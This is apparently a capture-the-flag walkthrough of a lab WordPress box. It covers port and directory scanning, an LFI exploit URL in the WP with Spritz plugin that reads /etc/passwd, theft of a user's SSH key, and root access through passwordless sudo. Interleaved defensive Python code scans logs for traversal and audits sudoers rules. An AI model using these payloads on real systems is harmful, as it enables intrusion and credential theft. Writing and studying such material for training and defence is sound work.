nmap -A -p- -oA cms 172.31.1.8 --min-rate=10000 --script=vuln --script-timeout=15 -v

[screenshot: Pasted image 20210714092325.png]

nmap -sC -sV -O -p- -oA cms 172.31.1.8

nmap -sU -O -p- -oA cms-udp 172.31.1.8

nikto -h 172.31.1.8:80

gobuster dir -k -u http://172.31.1.8/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

We open http://172.31.1.8 in the browser and see that it is a WordPress site.

wpscan --url http://172.31.1.8 -e ap --plugin-detection aggressive

[screenshot: Pasted image 20210714093131.png]

search spritz

searchsploit -m 44544.php

[screenshot: Pasted image 20210714094513.png]

cat 44544.php

[screenshot: Pasted image 20210714094531.png]

We request the following URLs and find the user angel:

http://172.31.1.8/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
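Added example (not part of the original writeup): a small Python log scanner a defender could run over the web server's access log to spot requests like the one above. It flags `../` traversal, remote-URL fetches and direct reads of sensitive paths in the `url` parameter of `wp.spritz.content.filter.php`. The log lines are constructed for the demo; the `id_rsa` location in one of them is an assumed path, not one taken from the box.

```python
import posixpath
import re
from typing import List, Optional
from urllib.parse import parse_qs, unquote, urlparse

# Endpoint of the WP with Spritz plugin that takes a user-controlled "url" parameter.
SPRITZ_ENDPOINT = "wp.spritz.content.filter.php"

# Local paths an LFI attempt typically targets; reading these through a content
# filter plugin is never legitimate rendering.
SENSITIVE_PREFIXES = ("/etc/", "/home/", "/root/", "/proc/", "/var/log/")

# Request-line part of a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not the box's real log). The key path in the
# second line is an assumption for the demo; the third mimics a remote fetch.
SAMPLE_LOG = """\
172.31.1.50 - - [14/Jul/2021:09:47:48 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd HTTP/1.1" 200 1893 "-" "Mozilla/5.0"
172.31.1.50 - - [14/Jul/2021:09:48:02 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=%2F..%2F..%2F..%2F..%2Fhome%2Fangel%2F.ssh%2Fid_rsa HTTP/1.1" 200 3243 "-" "Mozilla/5.0"
172.31.1.50 - - [14/Jul/2021:09:52:20 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http://203.0.113.7/page.html HTTP/1.1" 200 120 "-" "curl/7.74.0"
172.31.1.60 - - [14/Jul/2021:09:53:00 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/wp-content/uploads/2021/07/article.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
172.31.1.61 - - [14/Jul/2021:09:54:00 +0000] "GET /index.php HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
"""


def classify_spritz_request(request_path: str) -> Optional[dict]:
    """Return a finding for a suspicious request to the Spritz endpoint, else None."""
    parsed = urlparse(request_path)
    if not parsed.path.endswith(SPRITZ_ENDPOINT):
        return None
    target = parse_qs(parsed.query).get("url", [""])[0]
    # parse_qs already decoded once; decode again to catch double-encoded "%252e%252e%252f".
    target = unquote(target)
    if re.search(r"\.\.[/\\]", target):
        # normpath shows which file the traversal actually resolves to.
        return {"kind": "traversal", "resolved": posixpath.normpath(target)}
    if re.match(r"^[a-z][a-z0-9+.\-]*://", target, re.IGNORECASE):
        return {"kind": "remote_fetch", "resolved": target}
    if target.startswith(SENSITIVE_PREFIXES):
        return {"kind": "sensitive_path", "resolved": target}
    return None


def scan_access_log(text: str) -> List[dict]:
    """Scan combined-format log text and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        finding = classify_spritz_request(m.group("path"))
        if finding:
            finding["client"] = line.split(" ", 1)[0]
            finding["request"] = m.group("path")
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['client']} {f['kind']:15} {f['resolved']}")
```

The fourth line, a plain request under `/wp-content/uploads/`, produces no finding, so the scanner only reports the traversal, the key read and the remote fetch. In practice the same three checks belong in a WAF rule or a SIEM query keyed on the plugin path, and the real fix is updating or removing the plugin.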

[screenshot: Pasted image 20210714094748.png]

Then we copy the private key from this location and save it in a file called id_rsa:

http://172.31.1.8/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec

[screenshot: Pasted image 20210714095220.png]

chmod 400 id_rsa

ssh angel@172.31.1.8 -i id_rsa

[screenshot: Pasted image 20210714095956.png]

sudo -l

sudo -i
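Added example (not from the writeup): a Python audit of sudoers-style rules that flags the kind of entry that lets sudo -i succeed here. The rule text is constructed; the box's real sudoers content is not shown on the page, so the angel line is an assumption modelled on what sudo -l typically reports when sudo -i works without a password.

```python
import re
from typing import List

# Constructed sudoers-style rules (not the box's real /etc/sudoers). The "angel"
# line is an assumed rule shaped like the one that makes "sudo -i" succeed.
SAMPLE_SUDOERS = """\
# User privilege specification
root    ALL=(ALL:ALL) ALL
angel   ALL=(ALL) NOPASSWD: ALL
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx
%admin  ALL=(ALL) ALL
Defaults    env_reset
"""

# One user-specification line: who  host=(runas) TAG: commands
RULE_RE = re.compile(
    r"^(?P<who>[%+]?[\w.\-]+)\s+"      # user, %group or +netgroup
    r"(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"    # optional (user:group) run-as spec
    r"(?P<tags>(?:[A-Z]+:\s*)*)"       # tags such as NOPASSWD: or SETENV:
    r"(?P<cmds>.+)$"
)


def audit_sudoers(text: str) -> List[dict]:
    """Rate each non-root sudoers rule; root's own rule is expected and skipped."""
    findings = []
    for raw in text.splitlines():
        # Strip trailing comments; "#" is only a comment at line start or after whitespace.
        line = re.split(r"(?:^|\s)#", raw, maxsplit=1)[0].strip()
        if not line:
            continue
        m = RULE_RE.match(line)
        if not m or m.group("who") == "root":
            continue  # Defaults lines and root's rule are not findings
        runas_user = (m.group("runas") or "root").split(":")[0].strip() or "root"
        if runas_user == "ALL":
            runas_user = "root"  # ALL includes root
        nopasswd = "NOPASSWD:" in m.group("tags").upper()
        cmds = m.group("cmds").strip()
        if cmds == "ALL" and nopasswd:
            severity = "critical"
            why = f"any command as {runas_user} with no password (sudo -i gives a root shell)"
        elif cmds == "ALL":
            severity = "high"
            why = f"any command as {runas_user}, password required"
        elif nopasswd:
            severity = "medium"
            why = "passwordless but limited to a fixed command; review it for shell escapes"
        else:
            severity = "low"
            why = "specific command, password required"
        findings.append({"who": m.group("who"), "severity": severity, "cmds": cmds, "why": why})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{f['severity']:8} {f['who']:10} {f['cmds']}  ({f['why']})")
```

The same rating logic can be fed the output of `sudo -l` collected from each host, since the rule lines it prints use the same syntax; a "critical" hit is the entry to remove or narrow to the one command the account actually needs.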

[screenshot: Pasted image 20210714100041.png]

boxes

copyright©2022 Cu3rv0x all rights reserved